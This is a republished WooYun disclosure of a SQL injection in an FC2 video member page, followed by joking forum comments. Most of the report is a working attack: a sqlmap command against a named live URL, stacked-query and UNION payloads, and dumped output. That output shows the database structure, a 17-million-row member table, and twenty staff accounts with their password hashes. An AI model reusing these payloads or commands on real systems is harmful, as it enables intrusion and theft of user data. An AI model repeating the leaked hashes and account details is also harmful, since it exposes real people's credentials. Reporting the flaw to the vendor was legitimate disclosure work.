日本fc2视频一处注入可union（1729万用户数据电话/邮箱/密码）

2017年3月22日07:51:42评论892 views字数 263阅读0分52秒阅读模式

摘要

2016-03-18：细节已通知厂商并且等待厂商处理中
2016-03-20：厂商已经确认，细节仅向厂商公开
2016-03-30：细节向核心白帽子及相关领域专家公开
2016-04-09：细节向普通白帽子公开
2016-04-19：细节向实习白帽子公开
2016-05-04：细节向公众公开

漏洞概要关注数(36) 关注此漏洞

漏洞标题：日本fc2视频一处注入可union（1729万用户数据电话/邮箱/密码）

漏洞作者： sauce

提交时间： 2016-03-18 08:47

公开时间： 2016-05-04 17:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

4人收藏

漏洞详情

披露状态：

简要描述：

成立于 1999 年的 FC2 是世界上最大的成人网站之一，业务以日语为主，公司总部位于美国内华达州的拉斯维加斯。
FC2 采用会员制度，视频上传者则能通过会员的点击得到回报，通过银行卡结算。抛开道德因素，这形成了一个极其健康的良性循环，因此使得 FC2 的片源极其丰富。另外，FC2 的视频直播同样包含成人内容，通过付费点击，来自世界各地的主播们也能得丰厚的金钱回报。影音资源除去成人内容，还包含大量盗版电影资源和视频，FC2 的视频点击率在日本排名第三，排在 YouTube 和 Niconico 之后。

详细说明：

新域名

code 区域

python sqlmap.py -u "http://xiaojiadianvideo.asia/a/member.php?kobj_mb_id=82801549"

code 区域

---
 Parameter: kobj_mb_id (GET)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: kobj_mb_id=82801549;(SELECT * FROM (SELECT(SLEEP(5)))AeEw)#
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 3 columns
     Payload: kobj_mb_id=82801549 UNION ALL SELECT NULL,NULL,CONCAT(0x7178787871,0x6f51765857554a76694572557a665553425468724f7041596d63667573594a6e48486571784e6771,0x7178766271)-- -
 ---
 [08:07:13] [INFO] the back-end DBMS is MySQL
 [08:07:13] [INFO] fetching banner
 back-end DBMS: MySQL 5.0.11
 banner:    '5.6.24-log'
 [08:07:13] [INFO] fetching current user
 current user:    'videofc2@**.**.**.**/**.**.**.**'
 [08:07:13] [INFO] fetching current database
 current database:    'videofc2'
 [08:07:13] [INFO] fetching server hostname
 hostname:    'dbreplica1006.video.fc2'
 [08:07:13] [INFO] testing if current user is DBA
 [08:07:13] [INFO] fetching current user
 [08:07:13] [WARNING] reflective value(s) found and filtering out
 [08:07:13] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
 current user is DBA:    False
 [08:07:13] [INFO] fetching database users
 [08:07:13] [INFO] the SQL query used returns 1 entries
 [08:07:13] [INFO] resumed: 'videofc2'@'**.**.**.**/**.**.**.**'
 database management system users [1]:
 [*] 'videofc2'@'**.**.**.**/**.**.**.**'

+----------------------+----------------+

| Column | Type |

+----------------------+----------------+

| mb_add_at | binary(14) |

| mb_birth | binary(8) |

| mb_clap_flag | tinyint(1) |

| mb_description | blob |

| mb_edit_at | binary(14) |

| mb_exchange | tinyint(1) |

| mb_favorited_count | int(11) |

| mb_fc2id | int(11) |

| mb_from_service_type | varbinary(1) |

| mb_id | int(11) |

| mb_is_adult | binary(1) |

| mb_is_melmaga | binary(1) |

| mb_is_message_mailto | binary(1) |

| mb_isdel | binary(1) |

| mb_kari_mobile_mail | varbinary(250) |

| mb_language | varbinary(5) |

| mb_lastlogin | binary(14) |

| mb_loginpwd | varbinary(64) |

| mb_lv_bantime | int(11) |

| mb_lv_kickcount | varbinary(4) |

| mb_mail | varbinary(250) |

| mb_mobile_mail | varbinary(250) |

| mb_name | varbinary(64) |

| mb_pict | varbinary(250) |

| mb_pict_icon | varbinary(250) |

| mb_sex | binary(1) |

| mb_status | tinyint(1) |

| mb_tag | blob |

| mb_upcontent_count | int(11) |

+----------------------+----------------+

Database: videofc2

+----------+---------+

| Table | Entries |

+----------+---------+

| d_member | 17290940 |

+----------+---------+

</code>

漏洞证明：

code 区域

available databases [3]:
 [*] information_schema
 [*] videofc2
 [*] videofc2_non_replicated

可看到管理员帐号

code 区域

Database: videofc2
 Table: sa_users
 [20 entries]
 +-----+---------------------+---------------------------------+----------+---------------------+---------------------+-------------------------------------------------+
 | id  | name                | email                           | is_admin | created_at          | updated_at          | hashed_password                                 |
 +-----+---------------------+---------------------------------+----------+---------------------+---------------------+-------------------------------------------------+
 | 87  | takenaka            |     | 0        | 2013-05-01,02:53:08 | 2015-06-25,14:30:51 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 88  | eguadian            |             | 0        | 2011-11-16,09:51:30 | <blank>             | 806c315db059dc2e90a0383e04141d24f7c684dc        |
 | 90  | eguardian2          |            | 0        | 2011-11-18,15:33:11 | <blank>             | bb1106a74a40edb0da3ad494f74c44fa28f68964        |
 | 99  | testokamoto         |         | 0        | 2013-05-01,03:47:16 | <blank>             | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 102 | tochi               |      | 0        | 2014-06-05,08:33:49 | 2015-06-25,14:30:59 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 104 | infra_team          |                   | 1        | 2014-09-17,04:48:31 | 2015-07-06,15:00:48 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 105 | contents-check      |            | 1        | 2014-10-17,02:30:18 | 2014-10-17,02:30:29 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 111 | cs05                | fc2.cs05@**.**.**.**              | 1        | 2015-04-14,09:38:26 | 2015-04-14,09:39:36 | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 118 | trevor_basic        | trevor+basic@**.**.**.** | 0        | 2015-05-20,09:23:55 | <blank>             | da8aa682af9e58711b8766ea237d293472efd13e        |
 | 119 | takenaka-test       |   | 0        | 2015-06-01,01:47:40 | <blank>             | f48b20d7989dc54d1d32e563d4e5d05ce5d71a53        |
 | 120 | 2015-06-25,14:35:57 |                     | 1        | 2015-06-25,14:25:48 | <blank>             | 1f86f8cafa3734beeb0732466bffdf50fe2814f6        |
 | 121 | cs02                |                      | 1        | 2015-06-25,14:39:59 | 2015-10-01,09:34:32 | d5d6c6812b086aec7d24f21b114f327f1ba35aa7        |
 | 122 | cs02A               |                    | 1        | 2015-06-25,14:46:11 | 2015-07-06,16:45:24 | a6ef63d25d403a8bb5a62268359078057a8e24f0        |
 | 125 | 2015-07-07,08:18:11 |                     | 1        | 2015-07-07,08:18:04 | <blank>             | de9b57e2e11a380479c187545df08152284fa52a        |
 | 126 | <blank>             |                      | 0        | 2015-09-10,08:12:38 | <blank>             | e40b061c0384f38729bdd2973e3c7bdc9cad368f        |
 | 127 | <blank>             | fc2.cs03@**.**.**.**              | 0        | 2015-09-10,08:13:08 | <blank>             | 2e64944d48b58db3875fa8532285707d89c7c573        |
 | 128 | aldo                | aldo@**.**.**.**         | 0        | 2015-10-01,08:58:51 | <blank>             | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
 | 129 | aldo                | aldo+00@**.**.**.**      | 0        | 2015-10-01,09:19:41 | <blank>             | 1c89c0f71ac97754ffc597c567d01b2ade0c9324 (aldo) |
 | 130 | cs05                |                      | 0        | 2015-10-01,10:08:36 | <blank>             | 3b5eec56306e7b45ed75844fc3add7abca91789d        |
 | 131 | fc2.cs02+02         | fc2.cs02+02@**.**.**.**           | 0        | 2015-10-01,15:34:23 | <blank>             | 08f909d57fc27d0110791db7a17c9dfd904f9600        |

第一个库

code 区域

Database: videofc2
 [226 tables]
 +-------------------------------------+
 | Tracker_Summary                     |
 | Tracker_Summary_contents_holder     |
 | d_admin_abuse_auto_freezing_address |
 | d_admin_operation_contact_name      |
 | d_admin_operation_log               |
 | d_admin_operation_type              |
 | d_advertise_deploy                  |
 | d_advertise_select                  |
 | d_affiliate4cn                      |
 | d_affiliate4cn_summary              |
 | d_amazon_advertise                  |
 | d_amazon_advertise_category_ref     |
 | d_amazon_advertise_queue            |
 | d_amazon_advertise_ref              |
 | d_android_report                    |
 | d_app_genres                        |
 | d_auth_content                      |
 | d_aws_database                      |
 | d_bat_access_origin                 |
 | d_black_words                       |
 | d_cancellation_reason               |
 | d_channel_group                     |
 | d_channel_info                      |
 | d_channel_layer                     |
 | d_channel_video                     |
 | d_channel_video_ref                 |
 | d_contents_holder                   |
 | d_contents_holder_get_member        |
 | d_contents_holder_owner             |
 | d_convert_fake_mp4                  |
 | d_crontab_setting                   |
 | d_daily_popular                     |
 | d_deploy_setting                    |
 | d_dispersion_archive_servers        |
 | d_dispersion_charge_servers         |
 | d_dispersion_servers                |
 | d_dmca_input_data                   |
 | d_dmca_mail_auth                    |
 | d_dmca_monthly_summarized_data      |
 | d_dmca_reliable_right_holder        |
 | d_dmca_strike_log                   |
 | d_dmca_strike_summary               |
 | d_downloadcnt_android               |
 | d_encode_from_s3                    |
 | d_exclusion_ranking                 |
 | d_fc2id_for_veoh_members            |
 | d_feature_content                   |
 | d_feature_content_list              |
 | d_file_copy_log                     |
 | d_file_copy_status                  |
 | d_guest                             |
 | d_guest_spam                        |
 | d_himawari_group_id                 |
 | d_inapp_purchase_transactions       |
 | d_insert_key_frame                  |
 | d_inspected_review                  |
 | d_inspection_words                  |
 | d_ios_review                        |
 | d_ios_review_num                    |
 | d_keyword                           |
 | d_keyword_total                     |
 | d_member                            |
 | d_member_adult_blackwords_unprint   |
 | d_member_backup                     |
 | d_member_content_ban                |
 | d_member_custom_profile             |
 | d_member_deleted                    |
 | d_member_duplicatedid               |
 | d_member_duplicatedid2              |
 | d_member_favofriend                 |
 | d_member_favofriend_link            |
 | d_member_for_veoh_test              |
 | d_member_friend                     |
 | d_member_friendinfo                 |
 | d_member_login_count                |
 | d_member_mess                       |
 | d_member_plist                      |
 | d_member_plist_fine                 |
 | d_member_send                       |
 | d_member_spam                       |
 | d_member_trophy                     |
 | d_movies_on_cacheserver8            |
 | d_movies_transfer8                  |
 | d_mykeyword                         |
 | d_payment_user                      |
 | d_payment_user_backup               |
 | d_payment_user_lang_summary         |
 | d_payment_user_summary              |
 | d_paypal_log                        |
 | d_permit_cdn                        |
 | d_player_report                     |
 | d_prohibited_users                  |
 | d_prohibited_words                  |
 | d_push_devicetoken                  |
 | d_rank_ONE                          |
 | d_rank_ONE_lang                     |
 | d_rank_purchase                     |
 | d_rankcount                         |
 | d_recent_view_content               |
 | d_research                          |
 | d_review                            |
 | d_review_blackword_unprint          |
 | d_review_sjis                       |
 | d_review_spam                       |
 | d_reward_transactions               |
 | d_saymove_comeid                    |
 | d_sell_channel_image                |
 | d_sell_video_image                  |
 | d_sell_video_value                  |
 | d_sell_video_value_ref              |
 | d_server_info                       |
 | d_snap_evaluate                     |
 | d_snap_evalute_once                 |
 | d_snap_evalute_per_upid             |
 | d_snap_evalute_per_user             |
 | d_snap_ranking_transactions         |
 | d_snap_week_counter                 |
 | d_snap_weekscore                    |
 | d_snapvideo_favocount               |
 | d_sns_counter                       |
 | d_support_memo                      |
 | d_support_memo_tmp                  |
 | d_tag                               |
 | d_tag_blackword_unprint             |
 | d_tag_relation                      |
 | d_transaction_log                   |
 | d_upcontent                         |
 | d_upcontent_backup                  |
 | d_upcontent_blackword_unprint       |
 | d_upcontent_cat                     |
 | d_upcontent_cat_num                 |
 | d_upcontent_contest                 |
 | d_upcontent_inspected               |
 | d_upcontent_keyword                 |
 | d_upcontent_keyword_request         |
 | d_upcontent_live_score              |
 | d_upcontent_playtime                |
 | d_upcontent_purchase                |
 | d_upcontent_purchase_canceled       |
 | d_upcontent_reaction                |
 | d_upcontent_sell                    |
 | d_upcontent_sjis                    |
 | d_upcontent_sort                    |
 | d_upcontent_statistics              |
 | d_upcontent_stop_video              |
 | d_upcontent_veoh                    |
 | d_upcontent_veoh2                   |
 | d_upcontent_videoinfo               |
 | d_upload_block_ip                   |
 | d_upload_info                       |
 | d_upload_spam_info                  |
 | d_upload_spam_user                  |
 | d_uuid_linked_guest                 |
 | d_veoh_member_map                   |
 | d_video_pack                        |
 | d_video_pack_contents               |
 | d_video_pack_funds                  |
 | d_video_pack_member                 |
 | d_video_pack_plan                   |
 | d_video_pack_plan_history           |
 | d_view_history                      |
 | d_view_history_detail               |
 | d_viewcount                         |
 | d_viewcount_bk2_bk                  |
 | d_viewcount_per_cat                 |
 | d_violation                         |
 | d_violation_detail                  |
 | d_vote                              |
 | download_log                        |
 | download_purchase                   |
 | download_seller                     |
 | frozen_author                       |
 | frozen_author_entrust               |
 | frozen_movie                        |
 | frozen_movie_reserve                |
 | frozen_movie_reserve_history        |
 | g_as_count                          |
 | g_as_count_old                      |
 | g_media_pv                          |
 | g_pv                                |
 | iGIFan                              |
 | m_mcat                              |
 | m_mcat_backup                       |
 | movieT                              |
 | q_conv_flv                          |
 | q_conv_flv_pri                      |
 | q_conv_test                         |
 | q_convert                           |
 | q_convertedfile2deploy              |
 | q_delete                            |
 | q_file_create                       |
 | q_file_create_backup                |
 | q_flvh264                           |
 | q_frozen                            |
 | q_movie_info_inspection4china       |
 | q_other_trans                       |
 | q_purge_cdn                         |
 | q_range_of_video_pri                |
 | q_seize_points_for_contents         |
 | q_seize_points_for_members          |
 | q_solr_search                       |
 | q_suggest                           |
 | q_tweet_list                        |
 | q_upload                            |
 | s_auto_payment_log                  |
 | s_free_user_log                     |
 | s_jobserver                         |
 | s_login_count                       |
 | s_payment_user_daily_count          |
 | s_payment_user_log                  |
 | s_plist                             |
 | s_transaction_log                   |
 | s_upcontent                         |
 | s_video_pack_transaction_log        |
 | sa_fc2video_video_checks            |
 | sa_users                            |
 | seized_points_log_for_contents      |
 | seized_points_log_for_members       |
 | test_view_history                   |
 | tracker                             |
 | upcontent_view_count                |
 | upload_owner2                       |
 | upload_watch                        |
 | upload_watch2                       |
 | wifi_campaign_user                  |
 | xpremium_delete_log                 |
 +-------------------------------------+

第二个库

code 区域

back-end DBMS: MySQL 5.0.11
 Database: videofc2_non_replicated
 [62 tables]
 +----------------------------------+
 | _d_delivery_info                 |
 | _d_delivery_info_memo            |
 | _d_delivery_propose              |
 | d_audible_magic_count            |
 | d_audible_magic_log              |
 | d_auto_reconversion_settings     |
 | d_cancellation_log               |
 | d_cancellation_statistics        |
 | d_content_not_found              |
 | d_convert_status                 |
 | d_count_ginfo_access             |
 | d_delivery_freemp4_error         |
 | d_disk_free                      |
 | d_download_count                 |
 | d_download_count_1               |
 | d_download_count_2               |
 | d_download_mobile_count          |
 | d_download_mobile_count_1        |
 | d_download_mobile_count_2        |
 | d_download_payment_count_1       |
 | d_download_payment_count_2       |
 | d_email_booking                  |
 | d_email_booking_detail           |
 | d_file_transfer_count            |
 | d_move_movies                    |
 | d_move_original_files            |
 | d_movies_kddi_cacheserver        |
 | d_movies_kddi_cacheserver_mobile |
 | d_movies_kddi_cacheserver_test   |
 | d_movies_on_cacheserver          |
 | d_movies_transfer                |
 | d_movies_transfer_mobile         |
 | d_multiaccess                    |
 | d_multiaccess_payment            |
 | d_path_change                    |
 | d_payment_click                  |
 | d_payment_click_count            |
 | d_reconversion_que               |
 | d_service_status                 |
 | d_slow_ns_disp_user              |
 | d_slow_ns_ips                    |
 | d_spam_download                  |
 | d_spam_download_payment          |
 | d_spam_ip                        |
 | d_spam_ip2host                   |
 | d_spam_log                       |
 | d_spam_pattern                   |
 | d_spam_review_log                |
 | d_spam_vote_log                  |
 | d_total_payment_users            |
 | d_traffic                        |
 | d_traffic_free_mp4               |
 | d_traffic_payment                |
 | g_pv_test                        |
 | q_delete_freemp4                 |
 | q_purge_cdn_list                 |
 | q_suggest                        |
 | q_video_record                   |
 | s_analysis_member_action         |
 | s_link_ip_to_domainname          |
 | s_video_access_log               |
 | s_video_access_log_isp_summary   |
 +----------------------------------+

修复方案：

版权声明：转载请注明来源 sauce@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2016-03-20 17:40

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-18 08:56 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

2

FC2 是世界上最大的成人网站之一

1# 回复此人
2016-03-18 09:09 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

1

FC2 的片源极其丰富。

2# 回复此人
2016-03-18 09:11 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

1

@岛云首席鉴黄师

3# 回复此人
2016-03-18 09:17 | Fire ant ( 普通白帽子 | Rank:108 漏洞数:35 | 他们回来了................)

1

FC2 是世界上最大的成人网站之一

4# 回复此人
2016-03-18 09:19 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力！)

1

那么草榴是什么？华人最大？

5# 回复此人
2016-03-18 09:21 | Mr.li ( 普通白帽子 | Rank:106 漏洞数:36 | 爱萌妹子的骚年~)

1

可以找中国黑阔帮你哟，啧啧

6# 回复此人
2016-03-18 09:48 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

1

一直都是默默的看，不注册

7# 回复此人
2016-03-18 09:48 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)

1

什么时候帮我FC2冲一下点？

8# 回复此人
2016-03-18 09:49 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

1

。。其实我不知道什么是fc2

9# 回复此人
2016-03-18 09:59 | 东方先生 ( 路人 | Rank:13 漏洞数:9 | 高冷吴大神的腿)

1

FC2 是世界上最大的成人网站之一

10# 回复此人
2016-03-18 17:50 | 网络流氓 ( 路人 | Rank:29 漏洞数:3 | 欢迎热爱网络安全的朋友技术交流QQ:1020471...)

1

发图不发发种，菊花被人捅

11# 回复此人
2016-03-20 18:00 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

1

卧槽又学习到了 - -

12# 回复此人
2016-03-20 18:58 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

1

@网络流氓其实我还是很纯洁的没看过什么fc2

13# 回复此人
2016-03-21 08:30 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业！)

1

666 大牛，求带飞

14# 回复此人
2016-03-21 08:52 | 包包 ( 实习白帽子 | Rank:77 漏洞数:34 | 我是菜鸟，我怕谁？小弟新来，望大牛多多包...)

1

原来以前看的fc2是日本来的？我还以为是国产的某个系列的呢。。。

15# 回复此人
2016-03-21 09:13 | 网络流氓 ( 路人 | Rank:29 漏洞数:3 | 欢迎热爱网络安全的朋友技术交流QQ:1020471...)

1

@sauce 你可以狡辩，咱们可不信你丫滴

16# 回复此人

漏洞概要 关注数(36) 关注此漏洞

缺陷编号： WooYun-2016-186058

漏洞标题： 日本fc2视频一处注入可union（1729万用户数据 电话/邮箱/密码）

相关厂商： 日本fc2视频

漏洞作者： sauce

提交时间： 2016-03-18 08:47

公开时间： 2016-05-04 17:40

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+数字类型注射

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sauce@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(36) 关注此漏洞

漏洞标题：日本fc2视频一处注入可union（1729万用户数据电话/邮箱/密码）

相关厂商：日本fc2视频

危害等级：高

漏洞状态：已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞评价(共0人评价):

登陆后才能进行评分